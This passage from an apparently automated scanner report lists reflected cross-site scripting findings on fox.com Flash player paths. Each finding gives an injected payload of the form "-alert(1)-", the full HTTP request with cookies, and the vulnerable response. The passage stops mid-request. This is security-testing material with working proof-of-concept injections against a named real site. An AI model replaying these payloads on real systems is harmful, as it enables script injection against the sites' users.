<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FOX Broadcastin
...[SNIP]...
6="fox:shows" //Site Section
s_analytics.prop7="fox:shows:_ui" //Site Sub - Section
s_analytics.prop8="fox:shows:_ui:fox_playe" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:fox_playerswf56b6e"-alert(1)-"81daa3b06d4"
s_analytics.prop15="sub section:foxomnituremonitor" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_anal
...[SNIP]...

1.159. http://www.fox.com/_ui/fox_player/swf/akamaiHD.swf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.fox.com
Path:	/_ui/fox_player/swf/akamaiHD.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f141d"-alert(1)-"e64e46fa8a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /_uif141d"-alert(1)-"e64e46fa8a2/fox_player/swf/akamaiHD.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.116
Content-Type: text/html; charset=utf-8
Content-Length: 21852
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:14:35 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_uif141d"-alert(1)-"e64e46fa8a2:fox_playerakamaihd"
s_analytics.hier1="fox:shows:_uif141d"-alert(1)-"e64e46fa8a2:fox_playerakamaihd" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_uif141d"-alert(1)-"e64e46f
...[SNIP]...

1.160. http://www.fox.com/_ui/fox_player/swf/akamaiHD.swf [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.fox.com
Path:	/_ui/fox_player/swf/akamaiHD.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7276"-alert(1)-"48fb49619f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /_ui/fox_playere7276"-alert(1)-"48fb49619f8/swf/akamaiHD.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.113
Content-Type: text/html; charset=utf-8
Content-Length: 21824
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:14:40 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_playere7276"-alert(1)-"48fb49619f8akamaihd"
s_analytics.hier1="fox:shows:_ui:fox_playere7276"-alert(1)-"48fb49619f8akamaihd" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_playere7276"-alert(1)-"48fb496
...[SNIP]...

1.161. http://www.fox.com/_ui/fox_player/swf/akamaiHD.swf [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.fox.com
Path:	/_ui/fox_player/swf/akamaiHD.swf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c64f"-alert(1)-"ea254c087f9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /_ui/fox_player/swf6c64f"-alert(1)-"ea254c087f9/akamaiHD.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.106
Content-Type: text/html; charset=utf-8
Content-Length: 21712
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:14:44 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FOX Broadcastin
...[SNIP]...
6="fox:shows" //Site Section
s_analytics.prop7="fox:shows:_ui" //Site Sub - Section
s_analytics.prop8="fox:shows:_ui:fox_playe" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:fox_playerswf6c64f"-alert(1)-"ea254c087f9"
s_analytics.prop15="sub section:akamaihd" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_analytics.getQ
...[SNIP]...

1.162. http://www.fox.com/_ui/fox_player/swf/authentication.swf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.fox.com
Path:	/_ui/fox_player/swf/authentication.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3982f"-alert(1)-"621e918d4e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /_ui3982f"-alert(1)-"621e918d4e4/fox_player/swf/authentication.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.111
Content-Type: text/html; charset=utf-8
Content-Length: 21876
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:14:31 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui3982f"-alert(1)-"621e918d4e4:fox_playerauthentication"
s_analytics.hier1="fox:shows:_ui3982f"-alert(1)-"621e918d4e4:fox_playerauthentication" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui3982f"-alert
...[SNIP]...

1.163. http://www.fox.com/_ui/fox_player/swf/authentication.swf [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.fox.com
Path:	/_ui/fox_player/swf/authentication.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9977"-alert(1)-"e2c0455eee8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /_ui/fox_playerb9977"-alert(1)-"e2c0455eee8/swf/authentication.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.112
Content-Type: text/html; charset=utf-8
Content-Length: 21848
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:14:36 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_playerb9977"-alert(1)-"e2c0455eee8authentication"
s_analytics.hier1="fox:shows:_ui:fox_playerb9977"-alert(1)-"e2c0455eee8authentication" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_playerb9977"-alert
...[SNIP]...

1.164. http://www.fox.com/_ui/fox_player/swf/authentication.swf [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.fox.com
Path:	/_ui/fox_player/swf/authentication.swf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac0ad"-alert(1)-"78b834686 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /_ui/fox_player/swfac0ad"-alert(1)-"78b834686/authentication.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.105
Content-Type: text/html; charset=utf-8
Content-Length: 21734
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:14:40 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FOX Broadcastin
...[SNIP]...
6="fox:shows" //Site Section
s_analytics.prop7="fox:shows:_ui" //Site Sub - Section
s_analytics.prop8="fox:shows:_ui:fox_playe" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:fox_playerswfac0ad"-alert(1)-"78b834686"
s_analytics.prop15="sub section:authentication" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_analytic
...[SNIP]...

1.165. http://www.fox.com/_ui/fox_player/swf/foxComscoreResolverPlugIn.swf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.fox.com
Path:	/_ui/fox_player/swf/foxComscoreResolverPlugIn.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79185"-alert(1)-"40638905b61 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /_ui79185"-alert(1)-"40638905b61/fox_player/swf/foxComscoreResolverPlugIn.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.120
Content-Type: text/html; charset=utf-8
Content-Length: 21920
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:10:44 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui79185"-alert(1)-"40638905b61:fox_playerfoxcomscoreresolverplugin"
s_analytics.hier1="fox:shows:_ui79185"-alert(1)-"40638905b61:fox_playerfoxcomscoreresolverplugin" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox
...[SNIP]...

1.166. http://www.fox.com/_ui/fox_player/swf/foxComscoreResolverPlugIn.swf [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.fox.com
Path:	/_ui/fox_player/swf/foxComscoreResolverPlugIn.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14f20"-alert(1)-"50e3151d1ef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /_ui/fox_player14f20"-alert(1)-"50e3151d1ef/swf/foxComscoreResolverPlugIn.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.117
Content-Type: text/html; charset=utf-8
Content-Length: 21892
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:10:48 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_player14f20"-alert(1)-"50e3151d1effoxcomscoreresolverplugin"
s_analytics.hier1="fox:shows:_ui:fox_player14f20"-alert(1)-"50e3151d1effoxcomscoreresolverplugin" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:
...[SNIP]...

1.167. http://www.fox.com/_ui/fox_player/swf/foxComscoreResolverPlugIn.swf [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.fox.com
Path:	/_ui/fox_player/swf/foxComscoreResolverPlugIn.swf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7026e"-alert(1)-"46fe9d5d8f6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /_ui/fox_player/swf7026e"-alert(1)-"46fe9d5d8f6/foxComscoreResolverPlugIn.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.113
Content-Type: text/html; charset=utf-8
Content-Length: 21780
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:10:51 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FOX Broadcastin
...[SNIP]...
6="fox:shows" //Site Section
s_analytics.prop7="fox:shows:_ui" //Site Sub - Section
s_analytics.prop8="fox:shows:_ui:fox_playe" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:fox_playerswf7026e"-alert(1)-"46fe9d5d8f6"
s_analytics.prop15="sub section:foxcomscoreresolverplugin" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 =
...[SNIP]...

1.168. http://www.fox.com/_ui/fox_player/swf/foxUrlSigningPlugIn.swf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.fox.com
Path:	/_ui/fox_player/swf/foxUrlSigningPlugIn.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aeff3"-alert(1)-"ddf1ec587d0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /_uiaeff3"-alert(1)-"ddf1ec587d0/fox_player/swf/foxUrlSigningPlugIn.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.102
Content-Type: text/html; charset=utf-8
Content-Length: 21896
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:18:19 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_uiaeff3"-alert(1)-"ddf1ec587d0:fox_playerfoxurlsigningplugin"
s_analytics.hier1="fox:shows:_uiaeff3"-alert(1)-"ddf1ec587d0:fox_playerfoxurlsigningplugin" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_uiae
...[SNIP]...

1.169. http://www.fox.com/_ui/fox_player/swf/foxUrlSigningPlugIn.swf [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.fox.com
Path:	/_ui/fox_player/swf/foxUrlSigningPlugIn.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d142"-alert(1)-"355fb78501b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /_ui/fox_player9d142"-alert(1)-"355fb78501b/swf/foxUrlSigningPlugIn.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
